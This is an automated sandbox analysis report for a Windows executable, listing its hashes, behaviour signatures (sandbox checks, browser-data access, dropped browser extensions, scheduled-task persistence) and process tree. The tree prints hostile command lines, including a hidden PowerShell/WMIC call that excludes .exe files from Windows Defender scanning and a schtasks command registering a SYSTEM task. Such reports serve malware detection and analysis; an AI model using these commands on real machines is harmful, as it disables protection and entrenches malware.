Analysis
-
max time kernel
186s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
15-07-2024 05:07
Static task
static1
Behavioral task
behavioral1
Sample
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe
Resource
win7-20240704-en
General
-
Target
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe
-
Size
7.3MB
-
MD5
6703f9961b616ee37130065545ccf5df
-
SHA1
a8568da6d32ed551763a5de3bffac7578958036b
-
SHA256
c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3
-
SHA512
38063a127f3c7bbeb0d9d59227117a0c8836a72cf31c7cf6703e9a8adc644e2452a193d596d2998f5d22f794735e4918ecc335da807395e81b272912bbd53bfd
-
SSDEEP
98304:91OLrUDYqBxvBjQaHAS/aPmZ5wjT1yRqMtVxY0OO9aP2MrJ/RnlY/NlN//uxb5K2:91O8DrMaH7aFsqC40d6LDlY/utcw/Oq
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 38 5084 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1792 powershell.exe 212 powershell.EXE 1848 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation VsbdFRU.exe -
Executes dropped EXE 4 IoCs
pid Process 1780 Install.exe 4560 Install.exe 4512 Install.exe 4248 VsbdFRU.exe -
Loads dropped DLL 1 IoCs
pid Process 5084 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json VsbdFRU.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json VsbdFRU.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 VsbdFRU.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies VsbdFRU.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 VsbdFRU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA VsbdFRU.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\lgbVqjD.dll VsbdFRU.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\zWVRrMu.dll VsbdFRU.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VsbdFRU.exe File created C:\Program Files (x86)\nXmjFVOHU\ynQXpqM.xml VsbdFRU.exe File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\JFYWEla.xml VsbdFRU.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\MANdIKV.xml VsbdFRU.exe File created C:\Program Files (x86)\utOkvPMviNUn\qeXByIx.dll VsbdFRU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VsbdFRU.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\XHjaeoxVxtJfr.dll VsbdFRU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja VsbdFRU.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\wZMIrya.xml VsbdFRU.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak VsbdFRU.exe File created C:\Program Files (x86)\nXmjFVOHU\HaoVtf.dll VsbdFRU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi VsbdFRU.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\JHXYugTugXnbcjp.job schtasks.exe File created C:\Windows\Tasks\wVNtBGnRpnzfZepfO.job schtasks.exe File created C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job schtasks.exe File created C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3888 4512 WerFault.exe 85 4700 4560 WerFault.exe 75 5076 4248 WerFault.exe 155 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38ff9706-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix VsbdFRU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" VsbdFRU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache VsbdFRU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" VsbdFRU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4988 schtasks.exe 2016 schtasks.exe 3336 schtasks.exe 1384 schtasks.exe 1268 schtasks.exe 3428 schtasks.exe 500 schtasks.exe 4184 schtasks.exe 3404 schtasks.exe 2368 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 4436 powershell.exe 4436 powershell.exe 4436 powershell.exe 3040 powershell.exe 3040 powershell.exe 3040 powershell.exe 212 powershell.EXE 212 powershell.EXE 212 powershell.EXE 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 1848 powershell.exe 1848 powershell.exe 1848 powershell.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe 4248 VsbdFRU.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1792 powershell.exe Token: SeIncreaseQuotaPrivilege 700 WMIC.exe Token: SeSecurityPrivilege 700 WMIC.exe Token: SeTakeOwnershipPrivilege 700 WMIC.exe Token: SeLoadDriverPrivilege 700 WMIC.exe Token: SeSystemProfilePrivilege 700 WMIC.exe Token: SeSystemtimePrivilege 700 WMIC.exe Token: SeProfSingleProcessPrivilege 700 WMIC.exe Token: SeIncBasePriorityPrivilege 700 WMIC.exe Token: SeCreatePagefilePrivilege 700 WMIC.exe Token: SeBackupPrivilege 700 WMIC.exe Token: SeRestorePrivilege 700 WMIC.exe Token: SeShutdownPrivilege 700 WMIC.exe Token: SeDebugPrivilege 700 WMIC.exe Token: SeSystemEnvironmentPrivilege 700 WMIC.exe Token: SeRemoteShutdownPrivilege 700 WMIC.exe Token: SeUndockPrivilege 700 WMIC.exe Token: SeManageVolumePrivilege 700 WMIC.exe Token: 33 700 WMIC.exe Token: 34 700 WMIC.exe Token: 35 700 WMIC.exe Token: 36 700 WMIC.exe Token: SeIncreaseQuotaPrivilege 700 WMIC.exe Token: SeSecurityPrivilege 700 WMIC.exe Token: SeTakeOwnershipPrivilege 700 WMIC.exe Token: SeLoadDriverPrivilege 700 WMIC.exe Token: SeSystemProfilePrivilege 700 WMIC.exe Token: SeSystemtimePrivilege 700 WMIC.exe Token: SeProfSingleProcessPrivilege 700 WMIC.exe Token: SeIncBasePriorityPrivilege 700 WMIC.exe Token: SeCreatePagefilePrivilege 700 WMIC.exe Token: SeBackupPrivilege 700 WMIC.exe Token: SeRestorePrivilege 700 WMIC.exe Token: SeShutdownPrivilege 700 WMIC.exe Token: SeDebugPrivilege 700 WMIC.exe Token: SeSystemEnvironmentPrivilege 700 WMIC.exe Token: SeRemoteShutdownPrivilege 700 WMIC.exe Token: SeUndockPrivilege 700 WMIC.exe Token: SeManageVolumePrivilege 700 WMIC.exe Token: 33 700 WMIC.exe Token: 34 700 WMIC.exe Token: 35 700 WMIC.exe Token: 36 700 WMIC.exe Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 212 powershell.EXE Token: SeDebugPrivilege 1848 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2328 WMIC.exe Token: SeIncreaseQuotaPrivilege 2328 WMIC.exe Token: SeSecurityPrivilege 2328 WMIC.exe Token: SeTakeOwnershipPrivilege 2328 WMIC.exe Token: SeLoadDriverPrivilege 2328 WMIC.exe Token: SeSystemtimePrivilege 2328 WMIC.exe Token: SeBackupPrivilege 2328 WMIC.exe Token: SeRestorePrivilege 2328 WMIC.exe Token: SeShutdownPrivilege 2328 WMIC.exe Token: SeSystemEnvironmentPrivilege 2328 WMIC.exe Token: SeUndockPrivilege 2328 WMIC.exe Token: SeManageVolumePrivilege 2328 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2328 WMIC.exe Token: SeIncreaseQuotaPrivilege 2328 WMIC.exe Token: SeSecurityPrivilege 2328 WMIC.exe Token: SeTakeOwnershipPrivilege 2328 WMIC.exe Token: SeLoadDriverPrivilege 2328 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3716 wrote to memory of 1780 3716 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 74 PID 3716 wrote to memory of 1780 3716 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 74 PID 3716 wrote to memory of 1780 3716 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 74 PID 1780 wrote to memory of 4560 1780 Install.exe 75 PID 1780 wrote to memory of 4560 1780 Install.exe 75 PID 1780 wrote to memory of 4560 1780 Install.exe 75 PID 4560 wrote to memory of 3884 4560 Install.exe 77 PID 4560 wrote to memory of 3884 4560 Install.exe 77 PID 4560 wrote to memory of 3884 4560 Install.exe 77 PID 3884 wrote to memory of 4632 3884 forfiles.exe 79 PID 3884 wrote to memory of 4632 3884 forfiles.exe 79 PID 3884 wrote to memory of 4632 3884 forfiles.exe 79 PID 4632 wrote to memory of 1792 4632 cmd.exe 80 PID 4632 wrote to memory of 1792 4632 cmd.exe 80 PID 4632 wrote to memory of 1792 4632 cmd.exe 80 PID 1792 wrote to memory of 700 1792 powershell.exe 81 PID 1792 wrote to memory of 700 1792 powershell.exe 81 PID 1792 wrote to memory of 700 1792 powershell.exe 81 PID 4560 wrote to memory of 3428 4560 Install.exe 83 PID 4560 wrote to memory of 3428 4560 Install.exe 83 PID 4560 wrote to memory of 3428 4560 Install.exe 83 PID 4512 wrote to memory of 4436 4512 Install.exe 86 PID 4512 wrote to memory of 4436 4512 Install.exe 86 PID 4512 wrote to memory of 4436 4512 Install.exe 86 PID 4436 wrote to memory of 428 4436 powershell.exe 88 PID 4436 wrote to memory of 428 4436 powershell.exe 88 PID 4436 wrote to memory of 428 4436 powershell.exe 88 PID 428 wrote to memory of 424 428 cmd.exe 89 PID 428 wrote to memory of 424 428 cmd.exe 89 PID 428 wrote to memory of 424 428 cmd.exe 89 PID 4436 wrote to memory of 4460 4436 powershell.exe 90 PID 4436 wrote to memory of 4460 4436 powershell.exe 90 PID 4436 wrote to memory of 4460 4436 powershell.exe 90 PID 4436 wrote to memory of 3880 4436 powershell.exe 91 PID 4436 wrote to memory of 3880 4436 powershell.exe 91 PID 4436 wrote to memory of 3880 4436 powershell.exe 91 PID 4436 wrote to memory of 2620 4436 powershell.exe 92 PID 4436 wrote to memory of 2620 4436 powershell.exe 92 PID 4436 wrote to memory of 2620 4436 powershell.exe 92 PID 4436 wrote to memory of 3572 4436 powershell.exe 93 PID 4436 wrote to memory of 3572 4436 powershell.exe 93 PID 4436 wrote to memory of 3572 4436 powershell.exe 93 PID 4436 wrote to memory of 2932 4436 powershell.exe 94 PID 4436 wrote to memory of 2932 4436 powershell.exe 94 PID 4436 wrote to memory of 2932 4436 powershell.exe 94 PID 4436 wrote to memory of 4868 4436 powershell.exe 95 PID 4436 wrote to memory of 4868 4436 powershell.exe 95 PID 4436 wrote to memory of 4868 4436 powershell.exe 95 PID 4436 wrote to memory of 3740 4436 powershell.exe 96 PID 4436 wrote to memory of 3740 4436 powershell.exe 96 PID 4436 wrote to memory of 3740 4436 powershell.exe 96 PID 4436 wrote to memory of 1364 4436 powershell.exe 148 PID 4436 wrote to memory of 1364 4436 powershell.exe 148 PID 4436 wrote to memory of 1364 4436 powershell.exe 148 PID 4436 wrote to memory of 2828 4436 powershell.exe 98 PID 4436 wrote to memory of 2828 4436 powershell.exe 98 PID 4436 wrote to memory of 2828 4436 powershell.exe 98 PID 4436 wrote to memory of 1408 4436 powershell.exe 99 PID 4436 wrote to memory of 1408 4436 powershell.exe 99 PID 4436 wrote to memory of 1408 4436 powershell.exe 99 PID 4436 wrote to memory of 2136 4436 powershell.exe 100 PID 4436 wrote to memory of 2136 4436 powershell.exe 100 PID 4436 wrote to memory of 2136 4436 powershell.exe 100 PID 4436 wrote to memory of 4624 4436 powershell.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe"C:\Users\Admin\AppData\Local\Temp\c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\7zS6457.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\7zS666B.tmp\Install.exe.\Install.exe /yUcqTdidy "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS666B.tmp\Install.exe\" Ij /LYBndidx 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 7884⤵
- Program crash
PID:4700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS666B.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS666B.tmp\Install.exe Ij /LYBndidx 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
